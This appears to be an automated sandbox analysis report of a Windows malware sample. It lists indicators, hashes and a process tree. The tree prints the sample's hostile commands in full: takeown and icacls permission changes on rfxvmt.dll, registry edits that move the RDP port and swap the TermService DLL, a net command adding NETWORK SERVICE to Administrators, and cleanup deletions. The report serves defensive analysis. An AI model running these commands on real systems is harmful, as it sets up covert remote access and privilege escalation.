Analysis
-
max time kernel
138s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
01-07-2022 14:14
Static task
static1
Behavioral task
behavioral1
Sample
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
Resource
win10v2004-20220414-en
General
-
Target
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
-
Size
2.9MB
-
MD5
cc47bc788a58c510b00a5b288769a943
-
SHA1
184478b1e91d3354f5981c19e615bec766c38fab
-
SHA256
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e
-
SHA512
ddf966d08c8de80ff86f222a4b794d9b0afeb3a1c88070452d086a3e61b8e8c0d65b40afbd2c28f1c0ca9d8f3947a1d9d485177290e0a745091908337dd0e1e6
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1932 icacls.exe 872 icacls.exe 1940 icacls.exe 824 icacls.exe 1364 icacls.exe 1492 takeown.exe 1164 icacls.exe 1016 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat" reg.exe -
Processes:
resource yara_rule \Windows\Help\tmp5212.dat upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 624 powershell.exe -
Loads dropped DLL 5 IoCs
Processes:
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exepid process 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe 956 956 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 824 icacls.exe 1364 icacls.exe 1492 takeown.exe 1164 icacls.exe 1016 icacls.exe 1932 icacls.exe 872 icacls.exe 1940 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\tmp5213.dat powershell.exe File created C:\Windows\help\tmp5211.dat powershell.exe File created C:\Windows\help\tmp5212.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 624 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 624 powershell.exe Token: SeRestorePrivilege 1016 icacls.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.execmd.exepowershell.exenet.exedescription pid process target process PID 1660 wrote to memory of 1224 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 1660 wrote to memory of 1224 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 1660 wrote to memory of 1224 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 1660 wrote to memory of 1224 1660 b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe cmd.exe PID 1224 wrote to memory of 624 1224 cmd.exe powershell.exe PID 1224 wrote to memory of 624 1224 cmd.exe powershell.exe PID 1224 wrote to memory of 624 1224 cmd.exe powershell.exe PID 624 wrote to memory of 1492 624 powershell.exe takeown.exe PID 624 wrote to memory of 1492 624 powershell.exe takeown.exe PID 624 wrote to memory of 1492 624 powershell.exe takeown.exe PID 624 wrote to memory of 1164 624 powershell.exe icacls.exe PID 624 wrote to memory of 1164 624 powershell.exe icacls.exe PID 624 wrote to memory of 1164 624 powershell.exe icacls.exe PID 624 wrote to memory of 1016 624 powershell.exe icacls.exe PID 624 wrote to memory of 1016 624 powershell.exe icacls.exe PID 624 wrote to memory of 1016 624 powershell.exe icacls.exe PID 624 wrote to memory of 1932 624 powershell.exe icacls.exe PID 624 wrote to memory of 1932 624 powershell.exe icacls.exe PID 624 wrote to memory of 1932 624 powershell.exe icacls.exe PID 624 wrote to memory of 872 624 powershell.exe icacls.exe PID 624 wrote to memory of 872 624 powershell.exe icacls.exe PID 624 wrote to memory of 872 624 powershell.exe icacls.exe PID 624 wrote to memory of 1940 624 powershell.exe icacls.exe PID 624 wrote to memory of 1940 624 powershell.exe icacls.exe PID 624 wrote to memory of 1940 624 powershell.exe icacls.exe PID 624 wrote to memory of 824 624 powershell.exe icacls.exe PID 624 wrote to memory of 824 624 powershell.exe icacls.exe PID 624 wrote to memory of 824 624 powershell.exe icacls.exe PID 624 wrote to memory of 1364 624 powershell.exe icacls.exe PID 624 wrote to memory of 1364 624 powershell.exe icacls.exe PID 624 wrote to memory of 1364 624 powershell.exe icacls.exe PID 624 wrote to memory of 1780 624 powershell.exe reg.exe PID 624 wrote to memory of 1780 624 powershell.exe reg.exe PID 624 wrote to memory of 1780 624 powershell.exe reg.exe PID 624 wrote to memory of 444 624 powershell.exe reg.exe PID 624 wrote to memory of 444 624 powershell.exe reg.exe PID 624 wrote to memory of 444 624 powershell.exe reg.exe PID 624 wrote to memory of 1316 624 powershell.exe net.exe PID 624 wrote to memory of 1316 624 powershell.exe net.exe PID 624 wrote to memory of 1316 624 powershell.exe net.exe PID 1316 wrote to memory of 1184 1316 net.exe net1.exe PID 1316 wrote to memory of 1184 1316 net.exe net1.exe PID 1316 wrote to memory of 1184 1316 net.exe net1.exe PID 624 wrote to memory of 1600 624 powershell.exe cmd.exe PID 624 wrote to memory of 1600 624 powershell.exe cmd.exe PID 624 wrote to memory of 1600 624 powershell.exe cmd.exe PID 624 wrote to memory of 1612 624 powershell.exe cmd.exe PID 624 wrote to memory of 1612 624 powershell.exe cmd.exe PID 624 wrote to memory of 1612 624 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps13⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f4⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1Filesize
3.5MB
MD5fdd9a0a19257b291d81aef4d310e9cd4
SHA179fca0c2c1044c0382ee37158d3c993010f79afe
SHA256b842e422cea2540aa4d953b7940c18a6a5e23dabc933e979e9305b56cc3afd2e
SHA512bad901dcf7130ee315547313595d259a7954edaf7726d2d65a6412f56ca02d836f1f8cd86ba562d34654e286d6efbc901369be6cbae03cdea027bfa07006a7e2
-
C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txtFilesize
102B
MD57575fd92dd722a9f8eb4d7efce5e0a5f
SHA17773366c9157ac9be5247c45177ea2d7b7daf86b
SHA2566d6623e881557bf3874f34aeff1d81e4b28aa19f408c43a162a9432ad75f6e9b
SHA5127a50c77308c543886e7fa91149b39e3b0fd7de3b163d275dac03457c7ac4ce63adf4c8f0d22c59ceaae1e34a7eb6677461aad4081e7988502e85e142d0e6065c
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
\Users\Admin\AppData\Local\Temp\nsoB241.tmp\blowfish.dllFilesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
\Windows\Help\tmp5211.datFilesize
116KB
MD561de3d9dc03ed2a1d688e1425b52cfda
SHA168694949cbbba5f21515f6ef762356d20541f03c
SHA256cd32a60b92378244fdd4ad85965effac0a9ed538d43b9b06ee7e91c6c2a9a2a9
SHA5129138691813e976dacfc04336325d38236a66f8a3d1848c449a0ec29918cc4d21efd3ec33e39d87006302c10e821a132f2d1ef847dcfe1e2e6a4c132fd9762545
-
\Windows\Help\tmp5212.datFilesize
784KB
MD572f5170b8b6951ed93d6653bba6b17c1
SHA1baadfbc7fe2b2e9c87faddb2d161fa162627828d
SHA256d9a7b6d13f5a6f217a6f3e213b95a582d11a6fd93174ec4096892f0d7805e1b8
SHA512ad874d06546bb3948024a5456e97adbfd42a2a11b2aeba914cc89752ed778e6fa276bdf2be2d728f95e3accac07067e80488979a97b82581c9adafeac7c4cd69
-
memory/444-77-0x0000000000000000-mapping.dmp
-
memory/624-59-0x0000000000000000-mapping.dmp
-
memory/624-64-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/624-62-0x000007FEF3B00000-0x000007FEF465D000-memory.dmpFilesize
11.4MB
-
memory/624-66-0x000000000253B000-0x000000000255A000-memory.dmpFilesize
124KB
-
memory/624-85-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/624-63-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/624-61-0x000007FEF4660000-0x000007FEF5083000-memory.dmpFilesize
10.1MB
-
memory/624-60-0x000007FEFC021000-0x000007FEFC023000-memory.dmpFilesize
8KB
-
memory/624-86-0x000000000253B000-0x000000000255A000-memory.dmpFilesize
124KB
-
memory/824-74-0x0000000000000000-mapping.dmp
-
memory/872-72-0x0000000000000000-mapping.dmp
-
memory/1016-70-0x0000000000000000-mapping.dmp
-
memory/1164-69-0x0000000000000000-mapping.dmp
-
memory/1184-79-0x0000000000000000-mapping.dmp
-
memory/1224-58-0x0000000000000000-mapping.dmp
-
memory/1316-78-0x0000000000000000-mapping.dmp
-
memory/1364-75-0x0000000000000000-mapping.dmp
-
memory/1492-67-0x0000000000000000-mapping.dmp
-
memory/1600-83-0x0000000000000000-mapping.dmp
-
memory/1612-84-0x0000000000000000-mapping.dmp
-
memory/1660-54-0x0000000075761000-0x0000000075763000-memory.dmpFilesize
8KB
-
memory/1780-76-0x0000000000000000-mapping.dmp
-
memory/1932-71-0x0000000000000000-mapping.dmp
-
memory/1940-73-0x0000000000000000-mapping.dmp